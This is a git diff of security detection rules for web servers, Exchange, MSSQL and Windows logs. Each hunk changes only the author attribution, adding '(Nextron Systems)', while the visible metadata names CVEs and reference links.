a/rules/web/webserver_generic/web_cve_2021_33766_msexchange_proxytoken.yml b/rules/web/webserver_generic/web_cve_2021_33766_msexchange_proxytoken.yml index 65ddeeaf0..01a627e96 100644 --- a/rules/web/webserver_generic/web_cve_2021_33766_msexchange_proxytoken.yml +++ b/rules/web/webserver_generic/web_cve_2021_33766_msexchange_proxytoken.yml @@ -4,7 +4,7 @@ status: test description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766 references: - https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server -author: Florian Roth, Max Altgelt, Christian Burkard +author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2021_40539_adselfservice.yml b/rules/web/webserver_generic/web_cve_2021_40539_adselfservice.yml index 5c14fc27a..5c05cd89c 100644 --- a/rules/web/webserver_generic/web_cve_2021_40539_adselfservice.yml +++ b/rules/web/webserver_generic/web_cve_2021_40539_adselfservice.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539 references: - https://us-cert.cisa.gov/ncas/alerts/aa21-259a -author: Tobias Michalski, Max Altgelt +author: Tobias Michalski (Nextron Systems), Max Altgelt (Nextron Systems) date: 2021/09/20 modified: 2023/01/02 logsource: diff --git a/rules/web/webserver_generic/web_cve_2021_42237_sitecore_report_ashx.yml b/rules/web/webserver_generic/web_cve_2021_42237_sitecore_report_ashx.yml index ab367e684..82893f3f6 100644 --- a/rules/web/webserver_generic/web_cve_2021_42237_sitecore_report_ashx.yml +++ b/rules/web/webserver_generic/web_cve_2021_42237_sitecore_report_ashx.yml @@ -5,7 +5,7 @@ description: Detects exploitation attempts of Sitecore Experience Platform Pre-A references: - https://blog.assetnote.io/2021/11/02/sitecore-rce/ - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/17 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2021_43798_grafana.yml b/rules/web/webserver_generic/web_cve_2021_43798_grafana.yml index 67e18ed66..790b5c738 100644 --- a/rules/web/webserver_generic/web_cve_2021_43798_grafana.yml +++ b/rules/web/webserver_generic/web_cve_2021_43798_grafana.yml @@ -5,7 +5,7 @@ description: Detects a successful Grafana path traversal exploitation references: - https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/ - https://github.com/search?q=CVE-2021-43798 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/12/08 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2021_44228_log4j.yml b/rules/web/webserver_generic/web_cve_2021_44228_log4j.yml index 0f16fefb5..7dc6e2147 100644 --- a/rules/web/webserver_generic/web_cve_2021_44228_log4j.yml +++ b/rules/web/webserver_generic/web_cve_2021_44228_log4j.yml @@ -9,7 +9,7 @@ references: - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b - https://github.com/YfryTchsGD/Log4jAttackSurface - https://twitter.com/shutingrz/status/1469255861394866177?s=21 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/12/10 modified: 2022/02/06 tags: diff --git a/rules/web/webserver_generic/web_cve_2021_44228_log4j_fields.yml b/rules/web/webserver_generic/web_cve_2021_44228_log4j_fields.yml index 578839263..8029272c3 100644 --- a/rules/web/webserver_generic/web_cve_2021_44228_log4j_fields.yml +++ b/rules/web/webserver_generic/web_cve_2021_44228_log4j_fields.yml @@ -9,7 +9,7 @@ references: - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b - https://github.com/YfryTchsGD/Log4jAttackSurface - https://twitter.com/shutingrz/status/1469255861394866177?s=21 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/12/10 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2022_31656_auth_bypass.yml b/rules/web/webserver_generic/web_cve_2022_31656_auth_bypass.yml index 35f4f2705..bbc7841e2 100644 --- a/rules/web/webserver_generic/web_cve_2022_31656_auth_bypass.yml +++ b/rules/web/webserver_generic/web_cve_2022_31656_auth_bypass.yml @@ -7,7 +7,7 @@ description: | A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. references: - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/12 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2022_31659_vmware_rce.yml b/rules/web/webserver_generic/web_cve_2022_31659_vmware_rce.yml index 67cfa6fba..07506a13f 100644 --- a/rules/web/webserver_generic/web_cve_2022_31659_vmware_rce.yml +++ b/rules/web/webserver_generic/web_cve_2022_31659_vmware_rce.yml @@ -4,7 +4,7 @@ status: experimental description: Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659 references: - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/12 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2022_33891_spark_shell_command_injection.yml b/rules/web/webserver_generic/web_cve_2022_33891_spark_shell_command_injection.yml index 5505ef6f9..2e2f5db20 100644 --- a/rules/web/webserver_generic/web_cve_2022_33891_spark_shell_command_injection.yml +++ b/rules/web/webserver_generic/web_cve_2022_33891_spark_shell_command_injection.yml @@ -6,7 +6,7 @@ references: - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html - https://github.com/apache/spark/pull/36315/files -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/19 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml b/rules/web/webserver_generic/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml index 73b02128a..e3e0577f4 100644 --- a/rules/web/webserver_generic/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml +++ b/rules/web/webserver_generic/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml @@ -7,7 +7,7 @@ references: - https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/ - https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html - https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/29 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2022_44877_exploitation_attempt.yml b/rules/web/webserver_generic/web_cve_2022_44877_exploitation_attempt.yml index 4a0032b0d..889f5d5db 100644 --- a/rules/web/webserver_generic/web_cve_2022_44877_exploitation_attempt.yml +++ b/rules/web/webserver_generic/web_cve_2022_44877_exploitation_attempt.yml @@ -5,7 +5,7 @@ description: Detects potential exploitation attempts that target the Centos Web references: - https://seclists.org/fulldisclosure/2023/Jan/1 - https://www.rapid7.com/blog/post/2023/01/19/etr-exploitation-of-control-web-panel-cve-2022-44877/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/20 tags: - attack.initial_access diff --git a/rules/web/webserver_generic/web_cve_2022_46169_cacti_exploitation_attempt.yml b/rules/web/webserver_generic/web_cve_2022_46169_cacti_exploitation_attempt.yml index 59f319041..e820ced6f 100644 --- a/rules/web/webserver_generic/web_cve_2022_46169_cacti_exploitation_attempt.yml +++ b/rules/web/webserver_generic/web_cve_2022_46169_cacti_exploitation_attempt.yml @@ -6,7 +6,7 @@ references: - https://github.com/0xf4n9x/CVE-2022-46169 - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf - https://github.com/rapid7/metasploit-framework/pull/17407 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/27 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_exchange_exploitation_hafnium.yml b/rules/web/webserver_generic/web_exchange_exploitation_hafnium.yml index faafec280..6cb17fe85 100644 --- a/rules/web/webserver_generic/web_exchange_exploitation_hafnium.yml +++ b/rules/web/webserver_generic/web_exchange_exploitation_hafnium.yml @@ -5,7 +5,7 @@ description: Detects exploitation attempts in Exchange server logs as described references: - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/03/03 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_exchange_owassrf_exploitation.yml b/rules/web/webserver_generic/web_exchange_owassrf_exploitation.yml index 2f5fcd645..9525dab4c 100644 --- a/rules/web/webserver_generic/web_exchange_owassrf_exploitation.yml +++ b/rules/web/webserver_generic/web_exchange_owassrf_exploitation.yml @@ -5,7 +5,7 @@ description: Detects exploitation attempt of the OWASSRF variant targeting excha references: - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/ - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/22 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_exchange_owassrf_poc_exploitation.yml b/rules/web/webserver_generic/web_exchange_owassrf_poc_exploitation.yml index aff464193..c7b1bd402 100644 --- a/rules/web/webserver_generic/web_exchange_owassrf_poc_exploitation.yml +++ b/rules/web/webserver_generic/web_exchange_owassrf_poc_exploitation.yml @@ -6,7 +6,7 @@ references: - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/ - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/ - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/22 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_exchange_proxyshell.yml b/rules/web/webserver_generic/web_exchange_proxyshell.yml index 58aa4ca19..94e39a7b0 100644 --- a/rules/web/webserver_generic/web_exchange_proxyshell.yml +++ b/rules/web/webserver_generic/web_exchange_proxyshell.yml @@ -6,7 +6,7 @@ references: - https://youtu.be/5mqid-7zp8k?t=2231 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 -author: Florian Roth, Rich Warren +author: Florian Roth (Nextron Systems), Rich Warren date: 2021/08/07 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_exchange_proxyshell_successful.yml b/rules/web/webserver_generic/web_exchange_proxyshell_successful.yml index 0fa8806e5..1b7b6a64b 100644 --- a/rules/web/webserver_generic/web_exchange_proxyshell_successful.yml +++ b/rules/web/webserver_generic/web_exchange_proxyshell_successful.yml @@ -6,7 +6,7 @@ references: - https://youtu.be/5mqid-7zp8k?t=2231 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 -author: Florian Roth, Rich Warren +author: Florian Roth (Nextron Systems), Rich Warren date: 2021/08/09 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_jndi_exploit.yml b/rules/web/webserver_generic/web_jndi_exploit.yml index ffcacb97e..72ddf0a1d 100644 --- a/rules/web/webserver_generic/web_jndi_exploit.yml +++ b/rules/web/webserver_generic/web_jndi_exploit.yml @@ -5,7 +5,7 @@ description: Detects exploitation attempt using the JDNIExploiit Kit references: - https://github.com/pimps/JNDI-Exploit-Kit - https://githubmemory.com/repo/FunctFan/JNDIExploit -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/12/12 modified: 2022/12/25 logsource: diff --git a/rules/web/webserver_generic/web_nginx_core_dump.yml b/rules/web/webserver_generic/web_nginx_core_dump.yml index 5e28f1cc6..885da4765 100644 --- a/rules/web/webserver_generic/web_nginx_core_dump.yml +++ b/rules/web/webserver_generic/web_nginx_core_dump.yml @@ -5,7 +5,7 @@ description: Detects a core dump of a crashing Nginx worker process, which could references: - https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps - https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/05/31 modified: 2022/10/09 tags: diff --git a/rules/web/webserver_generic/web_solarwinds_supernova_webshell.yml b/rules/web/webserver_generic/web_solarwinds_supernova_webshell.yml index d25aaf46a..dde09001d 100644 --- a/rules/web/webserver_generic/web_solarwinds_supernova_webshell.yml +++ b/rules/web/webserver_generic/web_solarwinds_supernova_webshell.yml @@ -5,7 +5,7 @@ description: Detects access to SUPERNOVA webshell as described in Guidepoint rep references: - https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/ - https://www.anquanke.com/post/id/226029 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/12/17 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_sonicwall_jarrewrite_exploit.yml b/rules/web/webserver_generic/web_sonicwall_jarrewrite_exploit.yml index 2638e03d9..5fa857611 100644 --- a/rules/web/webserver_generic/web_sonicwall_jarrewrite_exploit.yml +++ b/rules/web/webserver_generic/web_sonicwall_jarrewrite_exploit.yml @@ -4,7 +4,7 @@ status: test description: Detects exploitation attempts of the SonicWall Jarrewrite Exploit references: - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/01/25 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_ssti_in_access_logs.yml b/rules/web/webserver_generic/web_ssti_in_access_logs.yml index 92a2447f5..101db7caf 100644 --- a/rules/web/webserver_generic/web_ssti_in_access_logs.yml +++ b/rules/web/webserver_generic/web_ssti_in_access_logs.yml @@ -5,7 +5,7 @@ description: Detects SSTI attempts sent via GET requests in access logs references: - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection - https://github.com/payloadbox/ssti-payloads -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/14 logsource: category: webserver diff --git a/rules/web/webserver_generic/web_susp_useragents.yml b/rules/web/webserver_generic/web_susp_useragents.yml index 61695df9b..31ca5769b 100644 --- a/rules/web/webserver_generic/web_susp_useragents.yml +++ b/rules/web/webserver_generic/web_susp_useragents.yml @@ -6,7 +6,7 @@ references: - https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb - https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst - https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92 -author: Nasreddine Bencherchali, Tim Shelton +author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton date: 2022/07/19 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_susp_windows_path_uri.yml b/rules/web/webserver_generic/web_susp_windows_path_uri.yml index ea98de552..42391902e 100644 --- a/rules/web/webserver_generic/web_susp_windows_path_uri.yml +++ b/rules/web/webserver_generic/web_susp_windows_path_uri.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication references: - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/06 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_unc2546_dewmode_php_webshell.yml b/rules/web/webserver_generic/web_unc2546_dewmode_php_webshell.yml index 825d9f1fa..e69b49012 100644 --- a/rules/web/webserver_generic/web_unc2546_dewmode_php_webshell.yml +++ b/rules/web/webserver_generic/web_unc2546_dewmode_php_webshell.yml @@ -4,7 +4,7 @@ status: test description: Detects access to DEWMODE webshell as described in FIREEYE report references: - https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/02/22 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml b/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml index cbd30ae64..8d1f2143b 100644 --- a/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml +++ b/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml @@ -5,7 +5,7 @@ description: Detects Windows Webshells that use GET requests via access logs references: - https://bad-jubies.github.io/RCE-NOW-WHAT/ - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2017/02/19 modified: 2022/11/18 tags: diff --git a/rules/windows/builtin/application/win_audit_cve.yml b/rules/windows/builtin/application/win_audit_cve.yml index d9afcde3f..6e9573131 100644 --- a/rules/windows/builtin/application/win_audit_cve.yml +++ b/rules/windows/builtin/application/win_audit_cve.yml @@ -11,7 +11,7 @@ references: - https://twitter.com/FlemmingRiis/status/1217147415482060800 - https://www.youtube.com/watch?v=ebmW42YYveI # "CVEs in Windows Event Logs? What You Need to Know" by 13Cubed. - https://nullsec.us/windows-event-log-audit-cve/ -author: Florian Roth, Zach Mathis +author: Florian Roth (Nextron Systems), Zach Mathis date: 2020/01/15 modified: 2022/10/22 tags: diff --git a/rules/windows/builtin/application/win_av_relevant_match.yml b/rules/windows/builtin/application/win_av_relevant_match.yml index 1f0e78476..510cc58e9 100644 --- a/rules/windows/builtin/application/win_av_relevant_match.yml +++ b/rules/windows/builtin/application/win_av_relevant_match.yml @@ -6,7 +6,7 @@ references: - https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31 - https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed - https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01 -author: Florian Roth, Arnim Rupp +author: Florian Roth (Nextron Systems), Arnim Rupp date: 2017/02/19 modified: 2022/05/12 tags: diff --git a/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml b/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml index 7054e3b6a..12bee966c 100644 --- a/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml +++ b/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml @@ -5,7 +5,7 @@ description: Detects potential abuse of ntdsutil to dump ntds.dit database references: - https://twitter.com/mgreen27/status/1558223256704122882 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11) -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/14 tags: - attack.execution diff --git a/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml b/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml index 579db113e..e50582afe 100644 --- a/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml +++ b/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml @@ -5,7 +5,7 @@ description: Detects potential abuse of ntdsutil to dump ntds.dit database to a references: - https://twitter.com/mgreen27/status/1558223256704122882 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11) -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/14 tags: - attack.execution diff --git a/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml b/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml index fc5d77a72..542e0add5 100644 --- a/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml +++ b/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml @@ -4,7 +4,7 @@ status: experimental description: Detects MSI package installation from suspicious locations references: - https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/31 modified: 2022/10/18 tags: diff --git a/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml b/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml index aab86633d..40591d53e 100644 --- a/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml +++ b/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml @@ -4,7 +4,7 @@ status: experimental description: Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role references: - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/13 tags: - attack.persistence diff --git a/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml b/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml index d37a036ac..310c462df 100644 --- a/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml +++ b/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml @@ -6,7 +6,7 @@ references: - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ - https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16 - https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/13 tags: - attack.defense_evasion diff --git a/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml b/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml index 0a8eae309..b7901b837 100644 --- a/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml +++ b/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml @@ -5,7 +5,7 @@ description: Detects when the a stored procedure is set or cleared for automatic references: - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ - https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/13 tags: - attack.persistence diff --git a/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml b/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml index f88127a4a..b0bca67b3 100644 --- a/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml +++ b/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml @@ -5,7 +5,7 @@ description: Detects when the MSSQL "xp_cmdshell" stored procedure is used to ex references: - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/12 tags: - attack.execution diff --git a/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml b/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml index 6d59e01df..fd93f6dce 100644 --- a/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml +++ b/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml @@ -5,7 +5,7 @@ description: Detects when the MSSQL "xp_cmdshell" stored procedure setting is ch references: - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/12 tags: - attack.execution diff --git a/rules/windows/builtin/application/win_susp_backup_delete.yml b/rules/windows/builtin/application/win_susp_backup_delete.yml index 3c4090da4..871ca2a81 100644 --- a/rules/windows/builtin/application/win_susp_backup_delete.yml +++ b/rules/windows/builtin/application/win_susp_backup_delete.yml @@ -5,7 +5,7 @@ description: Detects backup catalog deletions references: - https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 -author: Florian Roth (rule), Tom U. @c_APT_ure (collection) +author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection) date: 2017/05/12 modified: 2022/12/25 tags: diff --git a/rules/windows/builtin/application/win_susp_msmpeng_crash.yml b/rules/windows/builtin/application/win_susp_msmpeng_crash.yml index c97871988..3bdf9f6f1 100644 --- a/rules/windows/builtin/application/win_susp_msmpeng_crash.yml +++ b/rules/windows/builtin/application/win_susp_msmpeng_crash.yml @@ -5,7 +5,7 @@ description: This rule detects a suspicious crash of the Microsoft Malware Prote references: - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5 - https://technet.microsoft.com/en-us/library/security/4022344 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/05/09 modified: 2022/07/12 tags: diff --git a/rules/windows/builtin/application/win_vul_cve_2020_0688.yml b/rules/windows/builtin/application/win_vul_cve_2020_0688.yml index 4664c9f19..27199fce3 100644 --- a/rules/windows/builtin/application/win_vul_cve_2020_0688.yml +++ b/rules/windows/builtin/application/win_vul_cve_2020_0688.yml @@ -5,7 +5,7 @@ description: Detects the exploitation of Microsoft Exchange vulnerability as des references: - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/ - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/ -author: Florian Roth, wagga +author: Florian Roth (Nextron Systems), wagga date: 2020/02/29 modified: 2022/12/25 tags: diff --git a/rules/windows/builtin/application/win_vul_cve_2021_41379.yml b/rules/windows/builtin/application/win_vul_cve_2021_41379.yml index 501586ba0..08ba177eb 100644 --- a/rules/windows/builtin/application/win_vul_cve_2021_41379.yml +++ b/rules/windows/builtin/application/win_vul_cve_2021_41379.yml @@ -4,7 +4,7 @@ status: experimental description: Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379 references: - https://github.com/klinix5/InstallerFileTakeOver -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/22 modified: 2022/07/12 tags: diff --git a/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml b/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml index d4ac076dd..420037348 100644 --- a/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml +++ b/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml @@ -6,7 +6,7 @@ references: - https://github.com/deepinstinct/Lsass-Shtinkering - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/07 tags: - attack.credential_access diff --git a/rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml b/rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml index b62c4f02b..07e9eff3f 100644 --- a/rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml +++ b/rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of Sysinternals tools via an AppX package. Attackers could instal the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths references: - Internal Research -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/16 tags: - attack.defense_evasion diff --git a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml index 519c9f7b7..520a58bf4 100644 --- a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml +++ b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml @@ -6,7 +6,7 @@ references: - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ - https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/ -author: 